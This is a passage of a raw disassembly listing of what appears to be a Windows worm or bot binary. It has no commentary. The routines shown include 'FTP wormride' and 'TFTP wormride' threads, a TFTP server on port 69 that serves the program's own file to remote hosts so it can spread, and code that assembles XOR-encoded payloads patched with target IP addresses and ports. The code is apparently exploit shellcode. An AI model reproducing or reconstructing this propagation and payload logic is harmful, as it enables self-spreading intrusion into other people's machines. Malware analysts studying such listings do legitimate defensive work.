add esp, 10h
mov [ebp+var_1C4], eax
cmp [ebp+var_1C4], 0
jz short loc_411CAB
push [ebp+var_1C4]
call sub_411A09
pop ecx
test eax, eax
jz short loc_411C9F
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
cmp [ebp+var_4], 0
jnz short loc_411C76
push 2
lea eax, [ebp+var_18]
push eax
push [ebp+var_10]
call sub_404871
add esp, 0Ch
jmp short loc_411C9F
; ---------------------------------------------------------------------------
loc_411C76: ; CODE XREF: sub_411BBC+A5�j
push 2
lea eax, [ebp+var_18]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_411C9F
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_411D55
; ---------------------------------------------------------------------------
loc_411C9F: ; CODE XREF: sub_411BBC+98�j
; sub_411BBC+B8�j ...
push [ebp+var_1C4]
call sub_4053B1
pop ecx
loc_411CAB: ; CODE XREF: sub_411BBC+88�j
jmp loc_411BFD
; ---------------------------------------------------------------------------
loc_411CB0: ; CODE XREF: sub_411BBC+4F�j
cmp [ebp+var_10], 0
jnz short loc_411CC9
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_411D55
; ---------------------------------------------------------------------------
loc_411CC9: ; CODE XREF: sub_411BBC+F8�j
mov eax, [ebp+var_1C0]
push dword ptr [eax]
push offset unk_41C6DC
lea eax, [ebp+var_1BC]
push eax
call sub_40D53F
add esp, 0Ch
loc_411CE5: ; CODE XREF: sub_411BBC:loc_411D3C�j
push 3E8h
push [ebp+var_10]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_1C8], eax
cmp [ebp+var_1C8], 0
jz short loc_411D2E
cmp [ebp+var_1C8], 0FFFFFFFFh
jz short loc_411D2E
push [ebp+var_1C8]
push offset sub_41113B
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_411D2E
push [ebp+var_1C8]
call sub_4053B1
pop ecx
loc_411D2E: ; CODE XREF: sub_411BBC+145�j
; sub_411BBC+14E�j ...
mov eax, [ebp+var_1C0]
cmp dword ptr [eax+4], 0
jz short loc_411D3C
jmp short loc_411D3E
; ---------------------------------------------------------------------------
loc_411D3C: ; CODE XREF: sub_411BBC+17C�j
jmp short loc_411CE5
; ---------------------------------------------------------------------------
loc_411D3E: ; CODE XREF: sub_411BBC+17E�j
push [ebp+var_10]
call sub_404CBB
pop ecx
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
locret_411D55: ; CODE XREF: sub_411BBC+DE�j
; sub_411BBC+108�j
leave
retn 4
sub_411BBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411D59 proc near ; DATA XREF: sub_411D68+4E�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_411BBC
pop ebp
retn 4
sub_411D59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411D68 proc near ; CODE XREF: sub_40A9CF+70F�p
; sub_40A9CF+735�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
call sub_4042FB
test eax, eax
jz short loc_411D77
jmp short locret_411DC3
; ---------------------------------------------------------------------------
loc_411D77: ; CODE XREF: sub_411D68+B�j
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_411D8D
jmp short locret_411DC3
; ---------------------------------------------------------------------------
loc_411D8D: ; CODE XREF: sub_411D68+21�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aFtpWormrideThr ; "FTP wormride thread"
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_411D59
call sub_4095A4
add esp, 10h
locret_411DC3: ; CODE XREF: sub_411D68+D�j
; sub_411D68+23�j
leave
retn
sub_411D68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411DC5 proc near ; DATA XREF: sub_4123F6+43�o
var_DAC = dword ptr -0DACh
var_DA8 = dword ptr -0DA8h
var_DA4 = dword ptr -0DA4h
var_DA0 = byte ptr -0DA0h
var_D9C = dword ptr -0D9Ch
var_D98 = byte ptr -0D98h
var_D94 = dword ptr -0D94h
var_D90 = dword ptr -0D90h
var_D8C = dword ptr -0D8Ch
var_D88 = dword ptr -0D88h
var_D84 = dword ptr -0D84h
var_D80 = byte ptr -0D80h
var_D7C = dword ptr -0D7Ch
var_D70 = byte ptr -0D70h
var_D6F = byte ptr -0D6Fh
var_D6E = byte ptr -0D6Eh
var_D6D = byte ptr -0D6Dh
var_D6C = byte ptr -0D6Ch
var_B6C = dword ptr -0B6Ch
var_B68 = dword ptr -0B68h
var_B64 = dword ptr -0B64h
var_B60 = dword ptr -0B60h
var_B5C = dword ptr -0B5Ch
var_B58 = dword ptr -0B58h
var_358 = dword ptr -358h
var_354 = byte ptr -354h
var_1B0 = word ptr -1B0h
var_1AE = word ptr -1AEh
var_1AC = dword ptr -1ACh
var_1A0 = dword ptr -1A0h
var_19C = byte ptr -19Ch
var_19B = byte ptr -19Bh
var_19A = byte ptr -19Ah
var_199 = byte ptr -199h
var_11C = byte ptr -11Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0DACh
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_358]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 0
push 2
push 2
call dword_417218 ; socket
mov [ebp+var_108], eax
cmp [ebp+var_108], 0FFFFFFFFh
jnz short loc_411E1D
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4123F1
; ---------------------------------------------------------------------------
loc_411E1D: ; CODE XREF: sub_411DC5+43�j
lea eax, [ebp+var_104]
push eax
call sub_40CF25
push eax
call sub_40449C
pop ecx
pop ecx
push 10h
push 0
lea eax, [ebp+var_1B0]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_1B0], 2
push 45h
call dword_417238 ; ntohs
mov [ebp+var_1AE], ax
lea eax, [ebp+var_104]
push eax
call dword_417244 ; inet_addr
mov [ebp+var_1AC], eax
mov [ebp+var_1A0], 1
push 4
lea eax, [ebp+var_1A0]
push eax
push 4
push 0FFFFh
push [ebp+var_108]
call dword_417204 ; setsockopt
push 10h
lea eax, [ebp+var_1B0]
push eax
push [ebp+var_108]
call dword_417208 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_411EC2
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4123F1
; ---------------------------------------------------------------------------
loc_411EC2: ; CODE XREF: sub_411DC5+E8�j
push offset aRb ; "rb"
push offset dword_41EB2C
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_10C], eax
cmp [ebp+var_10C], 0
jnz short loc_411F01
push [ebp+var_108]
call dword_417230 ; closesocket
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4123F1
; ---------------------------------------------------------------------------
loc_411F01: ; CODE XREF: sub_411DC5+11B�j
mov eax, [ebp+var_358]
push dword ptr [eax]
push offset unk_41C788
lea eax, [ebp+var_354]
push eax
call sub_40D53F
add esp, 0Ch
push 2
push 0
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_10C]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_4], eax
push 0
push 0
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
push 80h
push 0
lea eax, [ebp+var_19C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_411F66: ; CODE XREF: sub_411DC5:loc_412084�j
; sub_411DC5:loc_4123C6�j
mov [ebp+var_B64], 1
and [ebp+var_B60], 0
and [ebp+var_B5C], 0
loc_411F7E: ; CODE XREF: sub_411DC5+234�j
and [ebp+var_B68], 0
jmp short loc_411F94
; ---------------------------------------------------------------------------
loc_411F87: ; CODE XREF: sub_411DC5:loc_411FB9�j
mov eax, [ebp+var_B68]
inc eax
mov [ebp+var_B68], eax
loc_411F94: ; CODE XREF: sub_411DC5+1C0�j
mov eax, [ebp+var_B68]
cmp eax, [ebp+var_B5C]
jnb short loc_411FBB
mov eax, [ebp+var_B68]
mov eax, [ebp+eax*4+var_B58]
cmp eax, [ebp+var_108]
jnz short loc_411FB9
jmp short loc_411FBB
; ---------------------------------------------------------------------------
loc_411FB9: ; CODE XREF: sub_411DC5+1F0�j
jmp short loc_411F87
; ---------------------------------------------------------------------------
loc_411FBB: ; CODE XREF: sub_411DC5+1DB�j
; sub_411DC5+1F2�j
mov eax, [ebp+var_B68]
cmp eax, [ebp+var_B5C]
jnz short loc_411FF5
cmp [ebp+var_B5C], 200h
jnb short loc_411FF5
mov eax, [ebp+var_B68]
mov ecx, [ebp+var_108]
mov [ebp+eax*4+var_B58], ecx
mov eax, [ebp+var_B5C]
inc eax
mov [ebp+var_B5C], eax
loc_411FF5: ; CODE XREF: sub_411DC5+202�j
; sub_411DC5+20E�j
xor eax, eax
test eax, eax
jnz short loc_411F7E
lea eax, [ebp+var_B64]
push eax
push 0
push 0
lea eax, [ebp+var_B5C]
push eax
push 0
call dword_41722C ; select
test eax, eax
jle loc_4123B8
mov [ebp+var_D84], 10h
mov al, byte_41DE30
mov [ebp+var_D70], al
mov ecx, 80h
xor eax, eax
lea edi, [ebp+var_D6F]
rep stosd
stosw
stosb
lea eax, [ebp+var_D84]
push eax
lea eax, [ebp+var_D80]
push eax
push 0
push 80h
lea eax, [ebp+var_19C]
push eax
push [ebp+var_108]
call dword_417258 ; recvfrom
mov [ebp+var_B6C], eax
cmp [ebp+var_B6C], 0
jz short loc_412084
cmp [ebp+var_B6C], 0FFFFFFFFh
jnz short loc_412089
loc_412084: ; CODE XREF: sub_411DC5+2B4�j
jmp loc_411F66
; ---------------------------------------------------------------------------
loc_412089: ; CODE XREF: sub_411DC5+2BD�j
movsx eax, [ebp+var_19C]
test eax, eax
jnz loc_4121C0
movsx eax, [ebp+var_19B]
cmp eax, 1
jnz loc_4121C0
lea eax, [ebp+var_19C]
mov [ebp+var_D88], eax
lea eax, [ebp+var_19C]
mov [ebp+var_D8C], eax
mov eax, [ebp+var_D88]
inc eax
inc eax
mov [ebp+var_D88], eax
mov eax, [ebp+var_D8C]
inc eax
inc eax
mov [ebp+var_D8C], eax
push [ebp+var_D8C]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_D8C]
lea eax, [ecx+eax+1]
mov [ebp+var_D8C], eax
push offset aOctet ; "octet"
call sub_416B40 ; strlen
pop ecx
push eax
push [ebp+var_D8C]
push offset aOctet ; "octet"
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jz short loc_41213F
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
push 13h
push offset dword_41C76C
push [ebp+var_108]
call dword_417250 ; sendto
jmp short loc_4121BB
; ---------------------------------------------------------------------------
loc_41213F: ; CODE XREF: sub_411DC5+354�j
push 0
push 0
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
and [ebp+var_D70], 0
mov [ebp+var_D6F], 3
and [ebp+var_D6E], 0
mov [ebp+var_D6D], 1
push [ebp+var_10C]
push 200h
push 1
lea eax, [ebp+var_D6C]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_D90], eax
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
mov eax, [ebp+var_D90]
add eax, 4
push eax
lea eax, [ebp+var_D70]
push eax
push [ebp+var_108]
call dword_417250 ; sendto
loc_4121BB: ; CODE XREF: sub_411DC5+378�j
jmp loc_4123B8
; ---------------------------------------------------------------------------
loc_4121C0: ; CODE XREF: sub_411DC5+2CD�j
; sub_411DC5+2DD�j
movsx eax, [ebp+var_19C]
test eax, eax
jnz loc_412396
movsx eax, [ebp+var_19B]
cmp eax, 4
jnz loc_412396
mov al, [ebp+var_19A]
mov [ebp+var_DA0], al
mov al, [ebp+var_199]
mov [ebp+var_D98], al
and [ebp+var_D70], 0
mov [ebp+var_D6F], 3
movzx eax, [ebp+var_D98]
cmp eax, 0FFh
jnz short loc_412242
mov al, [ebp+var_DA0]
add al, 1
mov [ebp+var_DA0], al
mov al, [ebp+var_DA0]
mov [ebp+var_D6E], al
and [ebp+var_D98], 0
mov al, [ebp+var_D98]
mov [ebp+var_D6D], al
jmp short loc_412268
; ---------------------------------------------------------------------------
loc_412242: ; CODE XREF: sub_411DC5+44C�j
mov al, [ebp+var_DA0]
mov [ebp+var_D6E], al
mov al, [ebp+var_D98]
add al, 1
mov [ebp+var_D98], al
mov al, [ebp+var_D98]
mov [ebp+var_D6D], al
loc_412268: ; CODE XREF: sub_411DC5+47B�j
movzx eax, [ebp+var_DA0]
shl eax, 8
movzx ecx, [ebp+var_D98]
lea eax, [eax+ecx-1]
mov [ebp+var_D9C], eax
push 0
mov eax, [ebp+var_D9C]
shl eax, 9
push eax
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_10C]
push 200h
push 1
lea eax, [ebp+var_D6C]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_D94], eax
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
mov eax, [ebp+var_D94]
add eax, 4
push eax
lea eax, [ebp+var_D70]
push eax
push [ebp+var_108]
call dword_417250 ; sendto
cmp [ebp+var_D94], 0
jnz loc_412394
mov eax, [ebp+var_D9C]
shl eax, 9
cmp eax, [ebp+var_4]
jb loc_412394
mov eax, [ebp+var_D7C]
mov [ebp+var_DA8], eax
push [ebp+var_DA8]
push offset dword_41EB10
call sub_409C9D
pop ecx
pop ecx
mov [ebp+var_DA4], eax
mov eax, [ebp+var_DA4]
cmp eax, [ebp+var_DA8]
jz short loc_412394
push 1
push offset dword_41EB14
call sub_409C88
pop ecx
pop ecx
mov [ebp+var_DAC], eax
push 10h
push [ebp+var_D7C]
call dword_41721C ; inet_ntoa
push eax
lea eax, [ebp+var_11C]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_11C]
push eax
mov eax, [ebp+var_DAC]
inc eax
push eax
push offset aWormride ; "wormride"
push offset unk_41C730
push offset dword_41DAB4
call sub_40D4AB
add esp, 14h
loc_412394: ; CODE XREF: sub_411DC5+52D�j
; sub_411DC5+53F�j ...
jmp short loc_4123B8
; ---------------------------------------------------------------------------
loc_412396: ; CODE XREF: sub_411DC5+404�j
; sub_411DC5+414�j
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
push 9
push offset dword_41C724
push [ebp+var_108]
call dword_417250 ; sendto
loc_4123B8: ; CODE XREF: sub_411DC5+252�j
; sub_411DC5:loc_4121BB�j ...
mov eax, [ebp+var_358]
cmp dword ptr [eax+4], 0
jz short loc_4123C6
jmp short loc_4123CB
; ---------------------------------------------------------------------------
loc_4123C6: ; CODE XREF: sub_411DC5+5FD�j
jmp loc_411F66
; ---------------------------------------------------------------------------
loc_4123CB: ; CODE XREF: sub_411DC5+5FF�j
push [ebp+var_10C]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_108]
call dword_417230 ; closesocket
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
loc_4123F1: ; CODE XREF: sub_411DC5+53�j
; sub_411DC5+F8�j ...
pop edi
leave
retn 4
sub_411DC5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4123F6 proc near ; CODE XREF: sub_40A9CF+726�p
; sub_40A9CF+742�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412410
jmp short locret_412446
; ---------------------------------------------------------------------------
loc_412410: ; CODE XREF: sub_4123F6+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aTftpWormrideTh ; "TFTP wormride thread"
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_411DC5
call sub_4095A4
add esp, 10h
locret_412446: ; CODE XREF: sub_4123F6+18�j
leave
retn
sub_4123F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412448 proc near ; CODE XREF: sub_4125DF+88�p
; sub_4125DF+AD�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_41245A
; ---------------------------------------------------------------------------
loc_412453: ; CODE XREF: sub_412448:loc_41249A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_41245A: ; CODE XREF: sub_412448+9�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jnb short loc_41249C
and [ebp+var_8], 0
jmp short loc_41246F
; ---------------------------------------------------------------------------
loc_412468: ; CODE XREF: sub_412448:loc_412498�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_41246F: ; CODE XREF: sub_412448+1E�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_C]
jnb short loc_41249A
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+arg_10]
xor eax, ecx
mov ecx, [ebp+arg_8]
add ecx, [ebp+var_8]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_412498
push 1
pop eax
jmp short locret_41249E
; ---------------------------------------------------------------------------
loc_412498: ; CODE XREF: sub_412448+49�j
jmp short loc_412468
; ---------------------------------------------------------------------------
loc_41249A: ; CODE XREF: sub_412448+2D�j
jmp short loc_412453
; ---------------------------------------------------------------------------
loc_41249C: ; CODE XREF: sub_412448+18�j
xor eax, eax
locret_41249E: ; CODE XREF: sub_412448+4E�j
leave
retn
sub_412448 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4124A0 proc near ; CODE XREF: sub_4125DF+36�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 10h
and [ebp+var_4], 0
and [ebp+var_10], 0
and [ebp+var_8], 0
and [ebp+var_C], 0
cmp [ebp+arg_8], 1
jnz short loc_41250C
cmp [ebp+arg_4], 0B2h
jnb short loc_4124CC
xor eax, eax
jmp locret_4125DD
; ---------------------------------------------------------------------------
loc_4124CC: ; CODE XREF: sub_4124A0+23�j
mov [ebp+var_C], 0B2h
push [ebp+var_C]
push offset dword_41C964
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 8Fh
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, 88h
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 0ACh
mov [ebp+var_8], eax
jmp loc_41259C
; ---------------------------------------------------------------------------
loc_41250C: ; CODE XREF: sub_4124A0+1A�j
cmp [ebp+arg_8], 2
jnz short loc_412554
cmp [ebp+arg_4], 0C6h
jnb short loc_412522
xor eax, eax
jmp locret_4125DD
; ---------------------------------------------------------------------------
loc_412522: ; CODE XREF: sub_4124A0+79�j
mov [ebp+var_C], 0C6h
push [ebp+var_C]
push offset dword_41C89C
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 89h
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 0C0h
mov [ebp+var_8], eax
jmp short loc_41259C
; ---------------------------------------------------------------------------
loc_412554: ; CODE XREF: sub_4124A0+70�j
cmp [ebp+arg_4], 0B2h
jnb short loc_412561
xor eax, eax
jmp short locret_4125DD
; ---------------------------------------------------------------------------
loc_412561: ; CODE XREF: sub_4124A0+BB�j
mov [ebp+var_C], 0B2h
push [ebp+var_C]
push offset dword_41C7E8
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 86h
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, 8Dh
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 0ACh
mov [ebp+var_8], eax
loc_41259C: ; CODE XREF: sub_4124A0+67�j
; sub_4124A0+B2�j
cmp [ebp+var_4], 0
jz short loc_4125B0
push [ebp+arg_C]
call dword_417244 ; inet_addr
mov ecx, [ebp+var_4]
mov [ecx], eax
loc_4125B0: ; CODE XREF: sub_4124A0+100�j
cmp [ebp+var_10], 0
jz short loc_4125CC
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
push eax
call dword_417238 ; ntohs
mov ecx, [ebp+var_10]
mov [ecx], ax
loc_4125CC: ; CODE XREF: sub_4124A0+114�j
cmp [ebp+var_8], 0
jz short loc_4125DA
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_14]
mov [eax], ecx
loc_4125DA: ; CODE XREF: sub_4124A0+130�j
mov eax, [ebp+var_C]
locret_4125DD: ; CODE XREF: sub_4124A0+27�j
; sub_4124A0+7D�j ...
leave
retn
sub_4124A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4125DF proc near ; CODE XREF: sub_410649+8B�p
; sub_410B52+41�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 1Ch
cmp [ebp+arg_4], 1Ch
jnb short loc_4125F2
xor eax, eax
jmp locret_41271E
; ---------------------------------------------------------------------------
loc_4125F2: ; CODE XREF: sub_4125DF+A�j
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 1Ch
mov [ebp+var_4], eax
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push 1E4h
push [ebp+var_4]
call sub_4124A0
add esp, 18h
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_41262D
xor eax, eax
jmp locret_41271E
; ---------------------------------------------------------------------------
loc_41262D: ; CODE XREF: sub_4125DF+45�j
push 1Ch
push offset loc_41C7C8
push [ebp+var_10]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, dword_41CB98
mov [ebp+var_8], eax
jmp short loc_412659
; ---------------------------------------------------------------------------
loc_412649: ; CODE XREF: sub_4125DF+94�j
; sub_4125DF:loc_41269A�j
call sub_410422
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov dword_41CB98, eax
loc_412659: ; CODE XREF: sub_4125DF+68�j
push 0
push [ebp+arg_1C]
push [ebp+arg_18]
push 4
lea eax, [ebp+var_8]
push eax
call sub_412448
add esp, 14h
test eax, eax
jz short loc_412675
jmp short loc_412649
; ---------------------------------------------------------------------------
loc_412675: ; CODE XREF: sub_4125DF+92�j
mov eax, [ebp+var_14]
xor eax, [ebp+var_8]
mov [ebp+var_1C], eax
push 0
push [ebp+arg_1C]
push [ebp+arg_18]
push 4
lea eax, [ebp+var_1C]
push eax
call sub_412448
add esp, 14h
test eax, eax
jnz short loc_41269A
jmp short loc_41269C
; ---------------------------------------------------------------------------
loc_41269A: ; CODE XREF: sub_4125DF+B7�j
jmp short loc_412649
; ---------------------------------------------------------------------------
loc_41269C: ; CODE XREF: sub_4125DF+B9�j
mov eax, [ebp+var_10]
mov ecx, [ebp+var_8]
mov [eax+3], ecx
mov eax, [ebp+var_10]
mov ecx, [ebp+var_1C]
mov [eax+9], ecx
mov al, byte_41CB95
mov byte ptr [ebp+var_C], al
jmp short loc_4126C8
; ---------------------------------------------------------------------------
loc_4126B8: ; CODE XREF: sub_4125DF+104�j
call sub_410461
mov byte ptr [ebp+var_C], al
mov al, byte ptr [ebp+var_C]
mov byte_41CB95, al
loc_4126C8: ; CODE XREF: sub_4125DF+D7�j
push [ebp+var_C]
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_14]
push [ebp+var_4]
call sub_412448
add esp, 14h
test eax, eax
jz short loc_4126E5
jmp short loc_4126B8
; ---------------------------------------------------------------------------
loc_4126E5: ; CODE XREF: sub_4125DF+102�j
mov eax, [ebp+var_10]
mov cl, byte ptr [ebp+var_C]
mov [eax+12h], cl
and [ebp+var_18], 0
jmp short loc_4126FB
; ---------------------------------------------------------------------------
loc_4126F4: ; CODE XREF: sub_4125DF+137�j
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
loc_4126FB: ; CODE XREF: sub_4125DF+113�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_14]
jnb short loc_412718
mov eax, [ebp+var_4]
add eax, [ebp+var_18]
mov al, [eax]
xor al, byte ptr [ebp+var_C]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_18]
mov [ecx], al
jmp short loc_4126F4
; ---------------------------------------------------------------------------
loc_412718: ; CODE XREF: sub_4125DF+122�j
mov eax, [ebp+var_14]
add eax, 1Ch
locret_41271E: ; CODE XREF: sub_4125DF+E�j
; sub_4125DF+49�j
leave
retn
sub_4125DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412720 proc near ; CODE XREF: sub_412A3A+C�p
; sub_412BC9+DF�p ...
var_194 = dword ptr -194h
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_E4 = byte ptr -0E4h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 194h
push 8
push 4
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_194], eax
and [ebp+var_190], 0
loc_412741: ; CODE XREF: sub_412720:loc_41278A�j
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+var_190]
mov [ebp+ecx+var_10], al
mov eax, [ebp+var_190]
inc eax
mov [ebp+var_190], eax
mov eax, [ebp+var_190]
cmp eax, [ebp+var_194]
jnz short loc_41278A
push offset dword_418620
mov eax, [ebp+var_190]
lea eax, [ebp+eax+var_10]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_41278C
; ---------------------------------------------------------------------------
loc_41278A: ; CODE XREF: sub_412720+4F�j
jmp short loc_412741
; ---------------------------------------------------------------------------
loc_41278C: ; CODE XREF: sub_412720+68�j
push 17Ch
push offset dword_41CA18
lea eax, [ebp+var_18C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push 17Ch
lea eax, [ebp+var_18C]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
leave
retn
sub_412720 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4127D0 proc near ; CODE XREF: sub_412A3A+14D�p
; sub_412BC9+133�p ...
var_24C = byte ptr -24Ch
var_22C = byte ptr -22Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24Ch
cmp dword_41EB1C, 0
jnz loc_4128A0
mov dword_41EB1C, 1
and [ebp+var_20C], 0
jmp short loc_412806
; ---------------------------------------------------------------------------
loc_4127F9: ; CODE XREF: sub_4127D0:loc_41289B�j
mov eax, [ebp+var_20C]
inc eax
mov [ebp+var_20C], eax
loc_412806: ; CODE XREF: sub_4127D0+27�j
mov eax, [ebp+var_20C]
imul eax, 0Ch
cmp off_41DA68[eax], 0
jz loc_4128A0
push 20h
mov eax, [ebp+var_20C]
imul eax, 0Ch
push off_41DA68[eax]
lea eax, [ebp+var_22C]
push eax
call sub_407A56
add esp, 0Ch
push 20h
mov eax, [ebp+var_20C]
imul eax, 0Ch
push off_41CBA0[eax]
lea eax, [ebp+var_24C]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_22C]
push eax
call sub_4105AD
pop ecx
lea eax, [ebp+var_24C]
push eax
call sub_4105AD
pop ecx
lea eax, [ebp+var_24C]
push eax
lea eax, [ebp+var_22C]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_41289B
mov dword_41EB20, 1
jmp short loc_4128A0
; ---------------------------------------------------------------------------
loc_41289B: ; CODE XREF: sub_4127D0+BD�j
jmp loc_4127F9
; ---------------------------------------------------------------------------
loc_4128A0: ; CODE XREF: sub_4127D0+10�j
; sub_4127D0+46�j ...
cmp dword_41EB20, 0
jz short loc_4128AE
push 1
pop eax
jmp short locret_412917
; ---------------------------------------------------------------------------
loc_4128AE: ; CODE XREF: sub_4127D0+D7�j
push offset aRb ; "rb"
push offset dword_41EC40
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_8], eax
